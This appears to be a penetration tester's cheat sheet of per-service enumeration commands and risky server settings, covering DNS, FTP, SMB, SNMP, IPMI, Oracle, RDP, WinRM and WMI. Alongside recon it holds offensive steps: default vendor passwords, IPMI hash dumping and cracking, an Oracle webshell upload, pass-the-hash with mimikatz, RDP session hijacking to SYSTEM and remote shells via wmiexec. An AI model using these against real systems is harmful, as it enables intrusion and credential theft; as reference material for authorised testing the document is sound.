4 - Vuln Analysis :: Cyber Cheatsheet

0) Scanning

Mon, 01 Jan 0001 00:00:00 +0000

Ports: https://www.stationx.net/common-ports-cheat-sheet/ https://web.archive.org/web/20240315102711/https://packetlife.net/media/library/23/common-ports.pdf https://nullsec.us/top-1-000-tcp-and-udp-ports-nmap-default/ OS Identification via: TTL: https://subinsb.com/default-device-ttl-values/ Host Discovery & ARP See more about… Host Discovery & ARP Source: Docs > 2 - Pre-Engagement > checklist#host-discovery--arp Host Discovery & ARP 1. Passive Listen (Responder / tcpdump) (Run Responder in passive mode or tcpdump to observe broadcast traffic, discover hosts, and passively collect credentials before any active scanning) 2. Interface & Subnet Mapping (Identify your own IP and CIDR via ip a or ipconfig to define the scope) 3. Passive Neighbor Discovery (Check the local ARP cache via arp -a or ip neigh to see connected peers) 4. Active Host Discovery (Run nmap -sn or netdiscover to sweep the subnet via ARP/ICMP) 5. Role Identification (Scan live hosts for specific ports like 88/445/389 to distinguish DCs from workstations) # -p: source port # TCP nc -nvzw5 # UDP nc -unvzw5 # Connect to Encrypted Service (TLS/SSL) openssl s_client -starttls ftp -connect : # Banner Grabbing sudo nmap -n -Pn --script banner.nse Ping Sweeps NOTE: sometimes ARP caches are delayed or not built… so running a ping sweep 2x is helpful

Common Web Applications

Mon, 01 Jan 0001 00:00:00 +0000

The following sections will detail how to enumerate various web appliations, which could lead to exploitation and access. EyeWitness For quick web application discovery. # https://github.com/RedSiege/EyeWitness git clone https://github.com/RedSiege/EyeWitness.git && cd EyeWitness/setup # cmake is already a part of build-essential sed -i 's/cmake//gI' ./setup.sh sudo ./setup.sh cd .. source eyewitness-venv/bin/activate # SCAN using nmap XML results output mkdir ../scan_eyewitness python Python/EyeWitness.py --web -x ../scan_nmap_disc_all_ports.xml -d ../scan_eyewitness Wordpress WPScan: https://github.com/wpscanteam/wpscan API for Vuln DB (free use requires token): https://wpscan.com/api/ WPScan is great, but manual enumeration can also uncover more information sometimes (e.g. certain plugins)

DNS

Mon, 01 Jan 0001 00:00:00 +0000

UDP 53: normal name queries TCP 53: zone transfers and syncs Server Config (Bind9) /etc/bind/named.conf.local /etc/bind/named.conf.options /etc/bind/named.conf.log https://wiki.debian.org/BIND9 https://web.archive.org/web/20250329174745/https://securitytrails.com/blog/most-popular-types-dns-attacks Domain Takeover: https://github.com/EdOverflow/can-i-take-over-xyz See more about… DNS Source: Docs > 2 - Pre-Engagement > checklist#dns DNS 1. Server Recon & Zone Transfer (Identify Nameservers, Bind version, and attempt dig axfr or dig any for a full dump) 2. Record Enumeration (Query standard types A, MX, TXT, SRV, and run Reverse DNS/PTR against IP ranges) 3. Subdomain Discovery (Combine passive cert transparency logs via crt.sh with active bruteforcing via gobuster/puredns) 4. Vulnerability Analysis (Check for dangling CNAMEs for Domain Takeover, and monitor LLMNR/NBT-NS if internal) Dangerous Settings Option Description allow-query Defines which hosts are allowed to send requests to the DNS server. allow-recursion Defines which hosts are allowed to send recursive requests to the DNS server. allow-transfer Defines which hosts are allowed to receive zone transfers from the DNS server. zone-statistics Collects statistical data of zones. # Add subdomains or vHosts echo ' ' | sudo tee -a /etc/hosts # Registrar Info whois | whois.txt # Query Nameserver for domain dig @ ns # PTR Record or Reverse DNS Query dig @ -x # OLD: version / all records / zone transfer dig @ CH TXT version.bind dig @ ANY dig @ AXFR # --- Record Types --- # ANY: return all records -- sometimes doesnt work! # A: IPv4 address # AAAA: IPv6 address # CNAME: Canonical Name # MX: Mail Servers # NS: Name Servers # PTR: Pointer Record # SOA: Start of Authority # TXT: Text Records # SRV: Service Records # CAA: Certification Authority Authorization for type in A AAAA CNAME MX NS SOA SRV TXT CAA; do echo -e "\n--- $type ---"; dig @ +short $type ; done # PASSIVE: subdomain enum # NOTE: requires API keys subfinder -v -d # ACTIVE: subdomain enum (quick, external) puredns bruteforce /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt # ACTIVE: subdomain enum (slower, internal) # /usr/share/SecLists/Discovery/DNS/namelist.txt gobuster dns --threads 64 --output gobuster_dns_top110000 --quiet -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --resolver --domain 🌐 Subdomains Certificate Transparency: https://crt.sh/ https://domain.glass/ (PAID) https://buckets.grayhatwarfare.com/ # Domain => Subdomains via Cert Registry curl -s "https://crt.sh/?q=&output=json" | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\\n/,"\n");}1;' | sort -u | tee subdomainlist.txt # Full Info for i in $(cat subdomainlist.txt) ; do host $i | tee -a hostinfo.txt ; done # (IPv4) Domain Name => IP Address for i in $(cat subdomainlist.txt) ; do host $i | grep "has address" | cut -d" " -f1,4 | tee -a domain_ipaddress.txt ; done # (IPv4) Addresses Only for i in $(cat domain_ipaddress.txt) ; do host $i | grep "has address" | cut -d" " -f4 | tee -a ip-addresses.txt ; done # (IPv4) Addresses => Services via Shodan for i in $(cat ip-addresses.txt) ; do shodan host $i ; done # DNS: old technique dig any # Content Search: google.com Dork inurl: intext: LLMNR & NBT-NS UDP 5355: LLMNR (modern) UDP 137: NBT-NS (ancient) Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that used as failover protocols when DNS is unavailable.

FTP

Mon, 01 Jan 0001 00:00:00 +0000

TCP 20: data transfer Active: Client->Server Passive: Server->Client TCP 21: control channel Server Config: /etc/vsftpd.conf http://vsftpd.beasts.org/vsftpd_conf.html DISALLOWED FTP users: /etc/ftpusers Commands: https://web.archive.org/web/20230326204635/https://www.smartfile.com/blog/the-ultimate-ftp-commands-list/ Server Return Codes: https://en.wikipedia.org/wiki/List_of_FTP_server_return_codes **TFTP has no auth and uses only UDP. Dangerous Settings Setting Description anonymous_enable=YES Allowing anonymous login? anon_upload_enable=YES Allowing anonymous to upload files? anon_mkdir_write_enable=YES Allowing anonymous to create new directories? no_anon_password=YES Do not ask anonymous for password? anon_root=/home/username/ftp Directory for anonymous. write_enable=YES Allow the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE? # Connect to FTP server in passive mode with anonymous login ftp -p ftp://:@ passive # lftp equivalents lftp ftp://:@ set ftp:passive-mode off # Execute local commands (outside of session) ! # List files and directories ls -la ls -laR # Read file get - # Download file get # Upload file put # Download all files mirror . # Download ALL files mkdir ftp_files && cd ftp_files wget -m --no-passive-ftp ftp://anonymous:anonymous@

HTTP

Mon, 01 Jan 0001 00:00:00 +0000

TCP 80: HTTP unencrypted TCP 443: HTTPS encrypted PORT (Web is oftentimes on other ports, especially internal proxies or admin pages on 8080 or 8433) See more about… Web Source: Docs > 2 - Pre-Engagement > checklist#web Web 1. Technology & Security Fingerprinting (Use whatweb and nikto to identify the server, frameworks, and WAF, and curl to inspect headers and robots.txt) 2. Content & vHost Discovery (Run feroxbuster or gobuster dir to bruteforce directories/files, and gobuster vhost to find hidden virtual hosts) 3. Automated Vulnerability Scanning (Use nikto or wapiti to scan for common misconfigurations and known vulnerabilities like outdated software) 4. Manual Application Testing (OWASP Top 10) (After automated scans, manually inspect the application for logical flaws, focusing on Injection, Broken Access Control, and XSS) OWASP Top 10: https://owasp.org/www-project-top-ten/ HTTP Codes: https://en.wikipedia.org/wiki/List_of_HTTP_status_codes#Standard_codes Web Page Scanner: https://github.com/RedSiege/EyeWitness /.well-known/ URIs: https://www.iana.org/assignments/well-known-uris/well-known-uris.xhtml User-Agent: https://useragents.io/explore Default Web Roots: Linux: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt Windows: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt # HTTP Headers + robots.txt curl -skLI -o curl_http_headers.txt http:// curl -skL -o curl_robots.txt http:///robots.txt --- # Checks for WAF (wbapp firewall) wafw00f # Enum web server + version + OS + frameworks + libraries whatweb --aggression 3 http:// --log-brief=whatweb_scan.txt # Fingerprint web server nikto -o nikto_fingerprint_scan.txt -Tuning b -h http:// # Enum web server vulns nikto -o nikto_vuln_scan.txt -h http:// # Enum web app logic & vulns wapiti -f txt -o wapiti_scan.txt --url http:// # Webpage Crawler pip3 install --break-system-packages scrapy wget -O ReconSpider.zip https://academy.hackthebox.com/storage/modules/144/ReconSpider.v1.2.zip && unzip ReconSpider.zip python3 ReconSpider.py && cat results.json # !!! CHECK "results.json" !!! See more about… vHost Brute-Force Source: Docs > 9 - Notes > ffuf#vhost-brute-force

IMAP/POP3

Mon, 01 Jan 0001 00:00:00 +0000

TCP 143/993: IMAP unc/enc TCP 110/995: POP3 unc/enc Dangerous Settings Setting Description auth_debug Enables all authentication debug logging. auth_debug_passwords This setting adjusts log verbosity, the submitted passwords, and the scheme gets logged. auth_verbose Logs unsuccessful authentication attempts and their reasons. auth_verbose_passwords Passwords used for authentication are logged and can also be truncated. auth_anonymous_username This specifies the username to be used when logging in with the ANONYMOUS SASL mechanism. # Enumerate sudo nmap -n -Pn -sV -sC -p25,110,143,465,587,993,995 ### Non-Interactive # IMAPS curl -vkL --user '':'' 'imaps://' -X # POP3S curl -vkL --user '':'' 'pop3s://' -X ### Interactive # IMAPS openssl s_client -connect :imaps 1 LOGIN 1 LIST "" * # Lists all directories 1 SELECT "" # Selects a mailbox 1 UNSELECT "" # Exits the selected mailbox 1 FETCH all # Metadata of email 1 FETCH 1:* (BODY[]) # Show all emails 1 CREATE "INBOX" # Creates a mailbox with a specified name 1 DELETE "INBOX" # Deletes a mailbox 1 RENAME "ToRead" "Important" # Renames a mailbox 1 LSUB "" * # Returns a subset of names from the set of names that the User has declared as being active or subscribed 1 CLOSE # Removes all messages with the Deleted flag set 1 LOGOUT # Closes the connection # POP3s openssl s_client -connect :pop3s USER PASS STAT # List num of saved emails from the server. LIST # List number and size of all emails. RETR # Deliver the requested email by ID. DELE # Delete the requested email by ID. CAPA # Display the server capabilities. RSET # Reset the transmitted information. QUIT # Close connection

IPMI

Mon, 01 Jan 0001 00:00:00 +0000

UDP 623: normal Default Passwords: Dell iDRAC: root:calvin HP iLO: Administrator:[randomized 8-character string consisting of numbers and uppercase letters] Supermicro IPMI: ADMIN:ADMIN A hardware control protocol that gives “virtual” physical access to a machine. Dangerous Settings Server sends the salted hash of the user’s password to the user before authentication ### Enumeration via nmap sudo nmap -sU -p623 --script ipmi-version ### Metasploit Scanner setg RHOSTS # https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_version/ use auxiliary/scanner/ipmi/ipmi_version run # https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes/ use auxiliary/scanner/ipmi/ipmi_dumphashes run ### Crack HP iLO format # https://hashcat.net/wiki/doku.php?id=example_hashes hashcat -m 7300 ipmi_hash.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u hashcat -m 7300 -w 3 -O "" /usr/share/wordlists/rockyou.txt

MySQL

Mon, 01 Jan 0001 00:00:00 +0000

TCP 3306: normal Server Config: /etc/mysql/mysql.conf.d/mysqld.cnf default system schemas/databases: mysql - is the system database that contains tables that store information required by the MySQL server information_schema - provides access to database metadata performance_schema - is a feature for monitoring MySQL Server execution at a low level sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema secure_file_priv may be set as follows: If empty, the variable has no effect, which is not a secure setting. If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it. If set to NULL, the server disables import and export operations System Schema: https://dev.mysql.com/doc/refman/8.0/en/system-schema.html#:~:text=The%20mysql%20schema%20is%20the,used%20for%20other%20operational%20purposes Logical Operators: https://mariadb.com/docs/server/reference/sql-structure/operators/operator-precedence Cheatsheet: https://devhints.io/mysql Database > Schema > Table > Column > Value

NFS

Mon, 01 Jan 0001 00:00:00 +0000

Similiar to SMB. TCP/UDP 111: NFSv2/v3 and various dynamic ports using rpcbind and portmapper TCP 2049: NFSv4 Server Config: /etc/exports https://manpages.ubuntu.com/manpages/trusty/man5/exports.5.html Dangerous Options Dangerous Option Description rw Read and write permissions. insecure Ports above 1024 will be used. nohide If another file system was mounted below an exported directory, this directory is exported by its own exports entry. no_root_squash All files created by root are kept with the UID/GID 0. # Show shared dirs df exportfs -sv # Show NFS Shares on server showmount -e # Mount NFS mkdir target-NFS sudo mount -t nfs -o nolock :/ ./target-NFS sudo umount ./target-NFS # Enumerate sudo nmap -n -Pn -p111,2049 -sV -sC sudo nmap -n -Pn -p111,2049 -sV --script 'nfs*'

Nix: R-services

Mon, 01 Jan 0001 00:00:00 +0000

TCP 512/513/514: rexecd, rlogind, rshd UDP 513: rwhod https://en.wikipedia.org/wiki/Berkeley_r-commands Server Config /etc/hosts.equiv: allowed hosts for rlogin ~/{.rlogin, .rhosts}: allowed hosts Suite of obsolete remote management tools. All communication is unencrypted including its authentication. # Enum via nmap sudo nmap -sV -p 512,513,514 # Remote copy; does not confirm remote overwriting of files rcp # Remote shell rsh # Remote command rexec # Remote login (telnet-like) rlogin -l # Show authenticated users rwho rusers -al

Nix: Rsync

Mon, 01 Jan 0001 00:00:00 +0000

TCP 873: normal Pentesting: https://archive.ph/flPtZ Rsync via ssh: https://phoenixnap.com/kb/how-to-rsync-over-ssh # Enum via nmap sudo nmap -sV -p873 # Enum dir rsync -av --list-only rsync:/// # Download dir optionally via SSH rsync -av -e "ssh -p " rsync:///

Nix: SSH

Mon, 01 Jan 0001 00:00:00 +0000

TCP 22: normal Server Config: /etc/ssh/sshd_config https://www.ssh.com/academy/ssh/sshd_config Versions: v1: obselete and vuln to MITM v2: modern Dangerous Settings https://www.ssh-audit.com/hardening_guides.html Setting Description PasswordAuthentication yes Allows password-based authentication. PermitEmptyPasswords yes Allows the use of empty passwords. PermitRootLogin yes Allows to log in as the root user. Protocol 1 Uses an outdated version of encryption. X11Forwarding yes Allows X11 forwarding for GUI applications. AllowTcpForwarding yes Allows forwarding of TCP ports. PermitTunnel Allows tunneling. DebianBanner yes Displays a specific banner when logging in. # Audit sercurity of SSH server # https://github.com/jtesta/ssh-audit git clone https://github.com/jtesta/ssh-audit.git && cd ssh-audit ./ssh-audit.py -l warn | tee ssh_audit.txt # Specify auth-method: password ssh -v -o PreferredAuthentications=password @ sshpass -p '' ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -p 22 @ # Force auth-method: privkey ssh -i @

Oracle TNS

Mon, 01 Jan 0001 00:00:00 +0000

TCP 1521: normal Server Config: $ORACLE_HOME/network/admin/tnsnames.ora: names to addrs $ORACLE_HOME/network/admin/listener.ora: listener behavior $ORACLE_HOME/sqldeveloper: DB protection blacklist Default Password: DBSNMP/dbsnmp https://docs.oracle.com/cd/E11882_01/server.112/e41085/sqlqraa001.htm#SQLQR985 Oracle’s version of SQL. # SID Brute-forcing via nmap sudo nmap -p1521 -sV --script oracle-sid-brute ### ODAT # TNS Setup for Enumeration wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-basic-linux.x64-21.4.0.0.0dbru.zip wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip sudo mkdir -p /opt/oracle sudo unzip -d /opt/oracle instantclient-basic-linux.x64-21.4.0.0.0dbru.zip sudo unzip -d /opt/oracle instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip export LD_LIBRARY_PATH=/opt/oracle/instantclient_21_4:$LD_LIBRARY_PATH export PATH=$LD_LIBRARY_PATH:$PATH source ~/.bashrc cd ~ git clone https://github.com/quentinhardy/odat.git cd odat/ pip install --break-system-packages python-libnmap git submodule init git submodule update pip3 install --break-system-packages cx_Oracle sudo apt install -y python3-scapy sudo pip3 install --root-user-action colorlog termcolor passlib python-libnmap sudo apt install -y build-essential libgmp-dev pip3 install --break-system-packages pycryptodome # Enumeration odat.py all -d -s ### Connect # Install: https://askubuntu.com/a/207145 sqlplus /@/ sqlplus /@/ as sysdba # https://stackoverflow.com/questions/27717312/sqlplus-error-while-loading-shared-libraries-libsqlplus-so-cannot-open-shared # If you come across the following error sqlplus: # error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory, sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf" ; sudo ldconfig # SQL Commands select table_name from all_tables ; select * from user_role_privs ; select name, password from sys.user$ ; ### Upload webshell (if webserver) # Linux /var/www/html # Windows C:\inetpub\wwwroot echo "Oracle File Upload Test" > testing.txt odat.py utlfile -d -U -P -s --sysdba --putFile testing.txt ./testing curl -Lo- http:///testing.txt

SMB/CIFS/RPC

Mon, 01 Jan 0001 00:00:00 +0000

TCP 135: RPC Endpoint Mapper (EPM) UDP 137, UDP 138, TPC 139: legacy (CIFS/SMB1) TCP 445: RPC/(SMB2/3) Shares: C$ (drive) ADMIN$ (Windows drive) IPC$ (RPC) PRINT$ See more about… SMB Source: Docs > 2 - Pre-Engagement > checklist#smb SMB 1. Anonymous Access & Share Listing (Attempt a null session via smbclient -L -N or crackmapexec smb --shares to list shares without credentials) 2. Comprehensive Enumeration (Run enum4linux-ng -A to automatically dump users, groups, OS info, and password policies) 3. Share Content Inspection (Mount accessible shares or use smbclient to browse directories for sensitive files, scripts, or backups) 4. Security Posture Check (Use nmap --script=smb-security-mode to verify if SMB signing is required, which is critical for preventing relay attacks) Dangerous Settings Setting Description browseable = yes Allow listing available shares in the current share? read only = no Forbid the creation and modification of files? writable = yes Allow users to create and modify files? guest ok = yes Allow connecting to the service without using a password? enable privileges = yes Honor privileges assigned to specific SID? create mask = 0777 What permissions must be assigned to the newly created files? directory mask = 0777 What permissions must be assigned to the newly created directories? logon script = script.sh What script needs to be executed on the user’s login? magic script = script.sh Which script should be executed when the script gets closed? magic output = script.out Where the output of the magic script needs to be stored? https://hacktricks.wiki/en/network-services-pentesting/pentesting-rpcbind.html # ANON: List available SMB shares smbclient -U "" -N --list /// smbclient -U "guest" -N --list /// # ANON: Connect to an SMB share smbclient -U "" -N /// smbclient -U "guest" -N /// # Connect to SMB share smbclient --user=/ --password='' /// ls # List files more # read file get # Download file recurse # Toggle directory recursion # Download recursion recurse on prompt off mget * # Execute local commands (outside of session) ! --- # https://www.netexec.wiki/getting-started/selecting-and-using-a-protocol # badPwdCount: https://learn.microsoft.com/en-us/windows/win32/adschema/a-badpwdcount nxc smb -u '' -p '' --users --groups --shares --pass-pol # User and Groups netexec smb -u "" -p "" --users netexec smb -u "" -p "" --groups # List shares netexec smb -u "" -p "" --shares # Recursively list files smbmap -r --depth 3 -r -u -p -H # Directories only smbmap -R -d -u -p -H --dir-only --- # https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf # https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html # RPC rpcclient -U '% querydominfo # Provides domain, server, and user info enumdomusers # Enumerates all domain users srvinfo # Server information enumdomains # Enumerate all domains netshareenumall # Enumerates available shares netsharegetinfo # Info about a specific share queryuser # User info --- # TODO: move these to a more appropriate/relevant section # Brute-Forcing RIDs via RPC for i in $(seq 500 1100);do rpcclient -N -U "" -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done # Same with other tools samrdump.py smbmap -H enum4linux-ng enum4linux-ng uses various protocols for enumeration that are outside of the scope here, but for knowledge of the services:

SMTP/ESMTP

Mon, 01 Jan 0001 00:00:00 +0000

TCP 25: unencrypted TCP 465/587/2525: encrypted Security: DKIM: https://dkim.org/ Sender Policy Framework (SPF): https://dmarcian.com/what-is-spf/ DMARC: https://dmarc.org/ https://serversmtp.com/smtp-error/ Dangerous Settings Option Description mynetworks = 0.0.0.0/0 With this setting, this SMTP server can send fake emails and thus initialize communication between multiple parties. Another attack possibility would be to spoof the email and read it. https://hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html#basic-actions # CAREFUL! Open relay check sudo nmap -p25,465,587,2525 --script smtp-open-relay # User enum # https://github.com/cytopia/smtp-user-enum#how-does-vrfy-work # TRY: -M VRFY wget https://raw.githubusercontent.com/cytopia/smtp-user-enum/refs/heads/master/smtp-user-enum python3 ./smtp-user-enum --mode VRFY --file /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt --domain 25 # Manual enumeration telnet 25 EHLO VRFY # 250 success; 252 maybe/not; 550 failure EXPN

SNMP

Mon, 01 Jan 0001 00:00:00 +0000

UDP 161: normal UDP 162: “trap” or alert OIDs: https://www.alvestrand.no/objectid/top.html Versions: v1/v2c: unencrypted v3: encryption via PSK /etc/snmp/snmpd.conf https://www.net-snmp.org/docs/man/snmpd.conf.html Management Information Base (MIB) is a text file of Object Identifier (OID) s, which provide addresses to access device info, in the Abstract Syntax Notation One (ASN.1) based ASCII text format. Community Strings are sort of “passwords” to manage the access level. Dangerous Settings Settings Description rwuser noauth Provides access to the full OID tree without authentication. rwcommunity Provides access to the full OID tree regardless of where the requests were sent from. rwcommunity6 Same access as with rwcommunity with the difference of using IPv6. # Enum via nmap sudo nmap -n -Pn -sU -p161 -sV --script 'snmp*' --reason -oA nmap_snmp_scan ### Brute-force names of Community Strings # - Default Strings: "public" (Read-Only) and "private" (Read/Write) are common onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt // probably "public" ### Brute-force OIDs and info # -v 1,2c,3 snmpwalk -v -c .1 ### Brute-force OIDs # -2 : use v2 # braa usu. uses Version 1 braa @:.1.* braa @:.1.3.6.*

Win: MSSQL

Mon, 01 Jan 0001 00:00:00 +0000

TCP/UDP 1433: normal TCP 2433: hidden mode default system schemas/databases: master - keeps the information for an instance of SQL Server. msdb - used by SQL Server Agent. model - a template database copied for each new database. resource - a read-only database that keeps system objects visible in every database on the server in sys schema. tempdb - keeps temporary objects for SQL queries. xp_cmdshell: xp_cmdshell is a powerful feature and disabled by default. It can be enabled and disabled by using the Policy-Based Management or by executing sp_configure The Windows process spawned by xp_cmdshell has the same security rights as the SQL Server service account xp_cmdshell operates synchronously. Control is not returned to the caller until the command-shell command is completed Microsoft’s closed-source version of SQL.

Win: RDP

Mon, 01 Jan 0001 00:00:00 +0000

TCP 3389: normal UDP 3389: automatic w/ RDP 8.0+ for performance (frames, audio, etc.) https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/tscon Also called “Terminal Services”. RDP via Pass the Hash Source: Docs > 6 - Post-Exploitation > pass-the-hash#rdp-restricted-admin-mode RDP (Restricted Admin Mode) https://learn.microsoft.com/en-us/windows/security/identity-protection/remote-credential-guard?tabs=intune #Enable Restricted Admin on Target (Requires Admin rights) reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f # Now RDP with Hash xfreerdp3 /v: /u: /pth: /cert:ignore +clipboard /dynamic-resolution /drive:/usr/share/windows-resources/mimikatz/x64,share # Enum via nmap sudo nmap -sV -sC --script 'rdp*' -p3389 # Enum RDP security posture sudo cpan sudo cpan Encoding::BER git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check ./rdp-sec-check.pl # Connects to RDP and mounts mimikatz share mkdir loot; xfreerdp3 +multitransport /clipboard /dynamic-resolution /cert:ignore /v: /u: /p:'' /drive:'/usr/share/windows-resources/mimikatz/x64',share /drive:"$HOME/loot",loot # Impersonate other logged-in user # NOTE: needs SYSTEM query.exe user tscon.exe /dest: # Local Admin => SYSTEM sc.exe create sessionhijack binpath= "cmd.exe /k tscon.exe /dest:" net.exe start sessionhijack # Enable RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Win: WinRM

Mon, 01 Jan 0001 00:00:00 +0000

TCP 5985/5986: via HTTP/HTTPS respectively # Enum via nmap sudo nmap --disable-arp-ping -n -Pn -sV -sC -p5985,5986 https://github.com/Hackplayers/evil-winrm evil-winrm -u -p -i evil-winrm -u -H -i PowerShell Remoting Requires valid Kerberos Ticket (PtT) or active NTLM Injection (PtH) in the current session. Ports TCP/5985 (HTTP) TCP/5986 (HTTPS) Requirements

Win: WMI

Mon, 01 Jan 0001 00:00:00 +0000

TCP 135: first, initialization TCP : afterwards, comms # Run interactive shell impacket-wmiexec :""@ # Run remote command impacket-wmiexec :""@ ""